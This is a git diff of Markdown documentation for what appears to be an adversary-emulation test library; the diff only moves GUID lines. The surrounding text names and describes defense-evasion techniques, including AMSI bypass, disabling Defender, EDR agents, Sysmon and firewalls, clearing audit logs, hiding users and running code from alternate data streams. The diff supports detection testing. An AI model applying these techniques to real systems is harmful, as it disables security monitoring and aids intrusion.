## Atomic Test #5 - Data Compressed - nix - zip - -auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c51cec55-28dd-4ad2-9461-1eacbc82c3a0 + + + #### Inputs: @@ -283,13 +293,15 @@ echo Please set input_files argument to include files that exist
## Atomic Test #6 - Data Compressed - nix - gzip Single File - -auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af + + + #### Inputs: @@ -319,13 +331,15 @@ rm -f #{input_file}.gz
## Atomic Test #7 - Data Compressed - nix - tar Folder or File - -auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a + + + #### Inputs: @@ -367,13 +381,15 @@ echo Please set input_file_folder argument to a folder that exists
## Atomic Test #8 - Data Encrypted with zip and gpg symmetric - -auto_generated_guid: 0286eb44-e7ce-41a0-b109-3da516e05a5f - Encrypt data for exiltration + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f + + + #### Inputs: diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md index 8cd45ba7..4f4895dc 100644 --- a/atomics/T1560.002/T1560.002.md +++ b/atomics/T1560.002/T1560.002.md @@ -18,13 +18,15 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and
## Atomic Test #1 - Compressing data using GZip in Python (Linux) - -auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 - Uses GZip from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8 + + + #### Inputs: @@ -66,13 +68,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #2 - Compressing data using bz2 in Python (Linux) - -auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d - Uses bz2 from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d + + + #### Inputs: @@ -114,13 +118,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #3 - Compressing data using zipfile in Python (Linux) - -auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 - Uses zipfile from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0 + + + #### Inputs: @@ -162,13 +168,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #4 - Compressing data using tarfile in Python (Linux) - -auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db - Uses tarfile from Python to compress files + **Supported Platforms:** Linux +**auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db + + + #### Inputs: diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md index 7c1e6f91..2200cf0c 100644 --- a/atomics/T1560/T1560.md +++ b/atomics/T1560/T1560.md @@ -12,14 +12,16 @@ Both compression and encryption are done prior to exfiltration, and can be perfo
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell - -auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory + **Supported Platforms:** Windows +**auto_generated_guid:** 41410c60-614d-4b9d-b66e-b0192dd9c597 + + + #### Inputs: diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index 4681b94f..ba2e2af9 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -56,13 +56,15 @@
## Atomic Test #1 - Disable syslog - -auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 - Disables syslog collection + **Supported Platforms:** Linux +**auto_generated_guid:** 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 + + + #### Inputs: @@ -106,13 +108,15 @@ sudo #{package_installer}
## Atomic Test #2 - Disable Cb Response - -auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 - Disable the Cb Response service + **Supported Platforms:** Linux +**auto_generated_guid:** ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 + + + @@ -139,13 +143,15 @@ fi
## Atomic Test #3 - Disable SELinux - -auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 - Disables SELinux enforcement + **Supported Platforms:** Linux +**auto_generated_guid:** fc225f36-9279-4c39-b3f9-5141ab74f8d8 + + + @@ -169,13 +175,15 @@ setenforce 1
## Atomic Test #4 - Stop Crowdstrike Falcon on Linux - -auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d - Stop and disable Crowdstrike Falcon on Linux + **Supported Platforms:** Linux +**auto_generated_guid:** 828a1278-81cc-4802-96ab-188bf29ca77d + + + @@ -201,13 +209,15 @@ sudo systemctl start falcon-sensor.service
## Atomic Test #5 - Disable Carbon Black Response - -auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c - Disables Carbon Black Response + **Supported Platforms:** macOS +**auto_generated_guid:** 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c + + + @@ -233,13 +243,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.pli
## Atomic Test #6 - Disable LittleSnitch - -auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 - Disables LittleSnitch + **Supported Platforms:** macOS +**auto_generated_guid:** 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 + + + @@ -263,13 +275,15 @@ sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
## Atomic Test #7 - Disable OpenDNS Umbrella - -auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 - Disables OpenDNS Umbrella + **Supported Platforms:** macOS +**auto_generated_guid:** 07f43b33-1e15-4e99-be70-bc094157c849 + + + @@ -293,13 +307,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfi
## Atomic Test #8 - Disable macOS Gatekeeper - -auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 - Disables macOS Gatekeeper + **Supported Platforms:** macOS +**auto_generated_guid:** 2a821573-fb3f-4e71-92c3-daac7432f053 + + + @@ -323,13 +339,15 @@ sudo spctl --master-enable
## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS - -auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef - Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS + **Supported Platforms:** macOS +**auto_generated_guid:** b3e7510c-2d4c-4249-a33f-591a2bc83eef + + + #### Inputs: @@ -361,14 +379,16 @@ sudo launchctl load -w #{userdaemon_plist}
## Atomic Test #10 - Unload Sysmon Filter Driver - -auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164 - Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". + **Supported Platforms:** Windows +**auto_generated_guid:** 811b3e76-c41b-430c-ac0d-e2380bfaa164 + + + #### Inputs: @@ -434,13 +454,15 @@ sysmon -accepteula -i
## Atomic Test #11 - Uninstall Sysmon - -auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc - Uninstall Sysinternals Sysmon for Defense Evasion + **Supported Platforms:** Windows +**auto_generated_guid:** a316fb2e-5344-470d-91c1-23e15c374edc + + + #### Inputs: @@ -494,16 +516,18 @@ cmd /c sysmon -i -accepteula
## Atomic Test #12 - AMSI Bypass - AMSI InitFailed - -auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd - Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ + **Supported Platforms:** Windows +**auto_generated_guid:** 695eed40-e949-40e5-b306-b4031e4154bd + + + @@ -527,15 +551,17 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key - -auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b - With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone. + **Supported Platforms:** Windows +**auto_generated_guid:** 13f09b91-c953-438e-845b-b585e51cac9b + + + @@ -559,15 +585,17 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #14 - Disable Arbitrary Security Windows Service - -auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5 - With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService" + **Supported Platforms:** Windows +**auto_generated_guid:** a1230893-56ac-4c81-b644-2108e982f8f5 + + + #### Inputs: @@ -598,14 +626,16 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #15 - Tamper with Windows Defender ATP PowerShell - -auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7 - Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b8df440-51ec-4d53-bf83-899591c9b5d7 + + + @@ -635,15 +665,17 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
## Atomic Test #16 - Tamper with Windows Defender Command Prompt - -auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2 - Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** aa875ed4-8935-47e2-b2c5-6ec00ab220d2 + + + @@ -670,14 +702,16 @@ sc config WinDefend start=enabled >nul 2>&1
## Atomic Test #17 - Tamper with Windows Defender Registry - -auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 - Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. + **Supported Platforms:** Windows +**auto_generated_guid:** 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 + + + @@ -701,17 +735,19 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #18 - Disable Microsoft Office Security Features - -auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 - Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ + **Supported Platforms:** Windows +**auto_generated_guid:** 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 + + + @@ -742,17 +778,19 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #19 - Remove Windows Defender Definition Files - -auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 - Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ + **Supported Platforms:** Windows +**auto_generated_guid:** 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 + + + @@ -772,13 +810,15 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
## Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service - -auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143 - Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. + **Supported Platforms:** Windows +**auto_generated_guid:** ae753dda-0f15-4af6-a168-b9ba16143143 + + + #### Inputs: @@ -804,13 +844,15 @@ Remove-Service -Name #{service_name}
## Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows - -auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 - Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. + **Supported Platforms:** Windows +**auto_generated_guid:** b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 + + + #### Inputs: @@ -835,15 +877,17 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet
## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder - -auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed - Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath + **Supported Platforms:** Windows +**auto_generated_guid:** 0b19f4ee-de90-4059-88cb-63c800c683ed + + + #### Inputs: @@ -874,15 +918,17 @@ Remove-MpPreference -ExclusionPath $excludedpath
## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension - -auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea - Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension. + **Supported Platforms:** Windows +**auto_generated_guid:** 315f4be6-2240-4552-b3e1-d1047f5eecea + + + #### Inputs: @@ -913,15 +959,17 @@ Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
## Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process - -auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27 - Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess." + **Supported Platforms:** Windows +**auto_generated_guid:** a123ce6a-3916-45d6-ba9c-7d4081315c27 + + + #### Inputs: diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md index 01ba57e2..213de5a4 100644 --- a/atomics/T1562.002/T1562.002.md +++ b/atomics/T1562.002/T1562.002.md @@ -18,16 +18,18 @@ Adversaries may targeting system-wide logging or just that of a particular appli
## Atomic Test #1 - Disable Windows IIS HTTP Logging - -auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db - Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. Use the cleanup commands to restore some default auditpol settings (your original settings will be lost) + **Supported Platforms:** Windows +**auto_generated_guid:** 69435dcf-c66f-4ec0-a8b1-82beb76b34db + + + #### Inputs: @@ -58,13 +60,15 @@ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
## Atomic Test #2 - Kill Event Log Service Threads - -auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd - Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html + **Supported Platforms:** Windows +**auto_generated_guid:** 41ac52ba-5d5e-40c0-b267-573ed90489bd + + + @@ -96,14 +100,16 @@ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
## Atomic Test #3 - Impair Windows Audit Log Policy - -auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 - Disables the windows audit policy to prevent key host based telemetry being written into the event logs. [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) + **Supported Platforms:** Windows +**auto_generated_guid:** 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 + + + @@ -131,13 +137,15 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
## Atomic Test #4 - Clear Windows Audit Policy Config - -auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 - Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. + **Supported Platforms:** Windows +**auto_generated_guid:** 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 + + + diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md index 6a66d737..d081df79 100644 --- a/atomics/T1562.003/T1562.003.md +++ b/atomics/T1562.003/T1562.003.md @@ -18,13 +18,15 @@ On Windows systems, the PSReadLine module tracks commands used in a
## Atomic Test #1 - Disable history collection - -auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 - Disables history collection in shells + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 + + + #### Inputs: @@ -50,16 +52,18 @@ export HISTCONTROL=ignoreboth
## Atomic Test #2 - Mac HISTCONTROL - -auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d - The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future settings as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 468566d5-83e5-40c1-b338-511e1659628d + + + #### Run it with these steps! diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index f9e8b9f6..27d556d3 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -24,13 +24,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
## Atomic Test #1 - Disable firewall - -auto_generated_guid: 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 - Disables the firewall + **Supported Platforms:** Linux +**auto_generated_guid:** 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 + + + #### Inputs: @@ -60,14 +62,16 @@ Disables the firewall
## Atomic Test #2 - Disable Microsoft Defender Firewall - -auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f - Disables the Microsoft Defender Firewall for the current profile. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + **Supported Platforms:** Windows +**auto_generated_guid:** 88d05800-a5e4-407e-9b53-ece4174f197f + + + @@ -91,14 +95,16 @@ netsh advfirewall set currentprofile state on >nul 2>&1
## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry - -auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 - Disables the Microsoft Defender Firewall for the public profile via registry Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + **Supported Platforms:** Windows +**auto_generated_guid:** afedc8c4-038c-4d82-b3e5-623a95f8a612 + + + @@ -122,14 +128,16 @@ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Param
## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall - -auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 - Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services... + **Supported Platforms:** Windows +**auto_generated_guid:** d9841bf8-f161-4c73-81e9-fd773a5ff8c1 + + + @@ -154,15 +162,17 @@ netsh advfirewall reset >nul 2>&1
## Atomic Test #5 - Opening ports for proxy - HARDRAIN - -auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 - This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** 15e57006-79dd-46df-9bf9-31bc24fb5a80 + + + @@ -186,13 +196,15 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
## Atomic Test #6 - Open a local port through Windows Firewall to any profile - -auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed - This test will attempt to open a local port defined by input arguments to any profile + **Supported Platforms:** Windows +**auto_generated_guid:** 9636dd6e-7599-40d2-8eee-ac16434f35ed + + + #### Inputs: @@ -221,13 +233,15 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location - -auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c - This test will attempt to allow an executable through the system firewall located in the Users directory + **Supported Platforms:** Windows +**auto_generated_guid:** 6f5822d2-d38d-4f48-9bfc-916607ff6b8c + + + #### Inputs: diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md index c4da8863..1db3c799 100644 --- a/atomics/T1562.006/T1562.006.md +++ b/atomics/T1562.006/T1562.006.md @@ -16,13 +16,15 @@ In the case of network-based reporting of indicators, an adversary may block tra
## Atomic Test #1 - Auditing Configuration Changes on Linux Host - -auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 - Emulates modification of auditd configuration files + **Supported Platforms:** Linux +**auto_generated_guid:** 212cfbcf-4770-4980-bc21-303e37abd0e3 + + + #### Inputs: @@ -63,13 +65,15 @@ sed -i '$ d' /etc/#{libaudit_config_file_name}
## Atomic Test #2 - Logging Configuration Changes on Linux Host - -auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c - Emulates modification of syslog configuration. + **Supported Platforms:** Linux +**auto_generated_guid:** 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c + + + #### Inputs: diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md index 766f1007..51534980 100644 --- a/atomics/T1563.002/T1563.002.md +++ b/atomics/T1563.002/T1563.002.md @@ -12,13 +12,15 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
## Atomic Test #1 - RDP hijacking - -auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46 - [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization + **Supported Platforms:** Windows +**auto_generated_guid:** a37ac520-b911-458e-8aed-c5f1576d9f46 + + + #### Inputs: diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md index 33358e45..35dbb5bc 100644 --- a/atomics/T1564.001/T1564.001.md +++ b/atomics/T1564.001/T1564.001.md @@ -28,13 +28,15 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
## Atomic Test #1 - Create a hidden file in a hidden directory - -auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be - Creates a hidden file inside a hidden directory + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be + + + @@ -59,13 +61,15 @@ rm -rf /var/tmp/.hidden-directory/
## Atomic Test #2 - Mac Hidden file - -auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 - Hide a file on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** cddb9098-3b47-4e01-9d3b-6f5f323288a9 + + + @@ -85,14 +89,16 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib - -auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 - Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details and observe that the Attributes are "SA" for System and Archive. + **Supported Platforms:** Windows +**auto_generated_guid:** f70974c8-c094-4574-b542-2c545af95a32 + + + #### Inputs: @@ -133,14 +139,16 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #4 - Create Windows Hidden File with Attrib - -auto_generated_guid: dadb792e-4358-4d8d-9207-b771faa0daa5 - Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file and observe that the Attributes are "SH" for System and Hidden. + **Supported Platforms:** Windows +**auto_generated_guid:** dadb792e-4358-4d8d-9207-b771faa0daa5 + + + #### Inputs: @@ -181,13 +189,15 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #5 - Hidden files - -auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 - Requires Apple Dev Tools + **Supported Platforms:** macOS +**auto_generated_guid:** 3b7015f2-3144-4205-b799-b05580621379 + + + #### Inputs: @@ -212,13 +222,15 @@ setfile -a V #(unknown)
## Atomic Test #6 - Hide a Directory - -auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 - Hide a directory on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 + + + @@ -243,13 +255,15 @@ rm /var/tmp/T1564.001_mac.txt
## Atomic Test #7 - Show all hidden files - -auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c - Show all hidden files on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** 9a1ec7da-b892-449f-ad68-67066d04380c + + + diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md index eb504c9a..766c53ee 100644 --- a/atomics/T1564.002/T1564.002.md +++ b/atomics/T1564.002/T1564.002.md @@ -14,13 +14,15 @@ There is a property value in /Library/Preferences/com.apple.loginwindow ## Atomic Test #1 - Create Hidden User using UniqueID < 500 - -auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507 - Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) + **Supported Platforms:** macOS +**auto_generated_guid:** 4238a7f0-a980-4fff-98a2-dfc0a363d507 + + + #### Inputs: @@ -49,13 +51,15 @@ sudo dscl . -delete /Users/#{user_name}
## Atomic Test #2 - Create Hidden User using IsHidden option - -auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 - Add a hidden user on macOS using IsHidden optoin + **Supported Platforms:** macOS +**auto_generated_guid:** de87ed7b-52c3-43fd-9554-730f695e7f31 + + + #### Inputs: diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md index a554980d..cdc08590 100644 --- a/atomics/T1564.003/T1564.003.md +++ b/atomics/T1564.003/T1564.003.md @@ -16,14 +16,16 @@ Adversaries may abuse these functionalities to hide otherwise visible windows fr
## Atomic Test #1 - Hidden Window - -auto_generated_guid: f151ee37-9e2b-47e6-80e4-550b9f999b7a - Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. Upon execution a hidden PowerShell window will launch calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** f151ee37-9e2b-47e6-80e4-550b9f999b7a + + + #### Inputs: diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md index 1a314f8c..6ad1f5eb 100644 --- a/atomics/T1564.004/T1564.004.md +++ b/atomics/T1564.004/T1564.004.md @@ -18,17 +18,19 @@ Adversaries may store malicious data or binaries in file attribute metadata inst
## Atomic Test #1 - Alternate Data Streams (ADS) - -auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4 - Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) + **Supported Platforms:** Windows +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f4602364f4 + + + #### Inputs: @@ -62,14 +64,16 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS) - -auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 - Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test + **Supported Platforms:** Windows +**auto_generated_guid:** 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 + + + #### Inputs: @@ -103,14 +107,16 @@ Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
## Atomic Test #3 - Create ADS command prompt - -auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb - Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" + **Supported Platforms:** Windows +**auto_generated_guid:** 17e7637a-ddaf-4a82-8622-377e20de8fdb + + + #### Inputs: @@ -141,14 +147,16 @@ del #{file_name} >nul 2>&1
